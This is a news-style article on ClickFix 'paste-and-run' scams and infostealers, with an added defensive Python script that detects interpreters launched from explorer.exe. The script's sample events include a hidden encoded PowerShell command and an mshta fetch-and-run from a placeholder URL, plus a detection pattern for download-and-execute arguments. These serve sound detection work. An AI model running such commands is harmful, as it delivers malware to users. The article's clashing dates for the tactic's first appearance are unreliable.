In recent years, social engineering tactics have evolved to become more sophisticated, with schemes like “ClickFix” and “ClearFake” emerging as prominent threats. These tactics, often referred to as “paste-and-run,” involve tricking users into executing malicious code themselves by presenting them with a deceptive scenario, such as a broken link or video that supposedly requires a fix. First documented by cybersecurity firm Proofpoint in 2023, these strategies have gained traction among both financially motivated cybercriminals and nation-state actors, leading to widespread malware infections.
Initially spotted in March 2024, paste-and-run tactics have been embraced by various threat actors, including notorious groups like APT28, also known as Fancy Bear. These groups leverage the tactic to distribute information-stealing malware, which harvests sensitive data from compromised systems. This data, often including credentials for cryptocurrency wallets, bank accounts, and other critical services, is then sold on cybercrime markets. The rise of such attacks has significantly contributed to the proliferation of infostealers, with Group-IB reporting a surge in related infections.
Infostealers are a significant concern due to their ability to extract valuable data, which is then sold on platforms like “clouds of logs” and Telegram channels. These illicit markets thrive as ransomware groups and initial access brokers seek high-quality credentials to facilitate further attacks. In 2024 alone, Flashpoint reported a staggering 3.2 billion credentials were stolen, highlighting the scale and impact of these operations. With a variety of infostealers in circulation, such as Lumma, RedLine, and Arcane, the threat landscape continues to evolve, posing ongoing challenges for cybersecurity defenders.
The global menace of ClickFix and similar tactics is exacerbated by attackers’ continuous refinement of their methods. Earlier iterations exploited fake browser updates to distribute malware, but by late 2023, attackers began employing tactics like “EtherHiding,” which retrieved obfuscated payloads stored on the BNB Smart Chain. These tactics often involve fake security prompts, such as reCAPTCHA challenges, to persuade users to execute the malicious code. Spear phishing, malicious advertising, and SEO poisoning are common methods for driving traffic to these deceptive pages.
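As an added illustration (not from the article, Group-IB, or Proofpoint), the script below shows one way a defender could flag paste-and-run executions in process-creation telemetry: a script interpreter launched directly from the Windows desktop shell (explorer.exe, which is the parent of anything typed into the Run dialog) with hidden-window, encoded-command, or fetch-from-URL arguments. The log events are constructed and the field names are assumed to follow a simplified Sysmon-style layout.

```python
import re

# Constructed sample of process-creation events (simplified Sysmon Event ID 1
# layout). Field names are an assumption for this example, not a real feed.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4A..."},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/captcha/verify.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
]

# Interpreters a pasted one-liner typically lands in.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe")

# Argument patterns: hidden window, encoded/bypass flags, or fetch-and-run.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b|"
    r"\biex\b|invoke-expression|downloadstring|https?://)",
    re.IGNORECASE,
)


def is_paste_and_run(event):
    """True if an interpreter was spawned straight from explorer.exe
    (Run dialog / desktop shell) with suspicious command-line arguments."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not parent.endswith("\\explorer.exe"):
        return False
    if not image.endswith(INTERPRETERS):
        return False
    return bool(SUSPICIOUS_ARGS.search(cmd))


def find_suspicious(events):
    """Return the command lines of events that match the paste-and-run shape."""
    return [e["CommandLine"] for e in events if is_paste_and_run(e)]


if __name__ == "__main__":
    for cmd in find_suspicious(SAMPLE_EVENTS):
        print("ALERT paste-and-run candidate:", cmd)
```

The same parent/child check can be expressed as a Sigma or EDR rule; the regex is deliberately narrow and should be tuned against an organisation's own baseline of legitimate explorer.exe-spawned interpreters.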
The prevalence of ClickFix pages has surged, with Group-IB documenting a significant increase in malicious and legitimate domains hosting these attacks. This trend underscores the effectiveness and popularity of such tactics among threat actors, who continue to refine their strategies to deceive users and achieve their malicious objectives. As these schemes become more frequent and sophisticated, the cybersecurity community must remain vigilant in developing countermeasures to protect users from these evolving threats.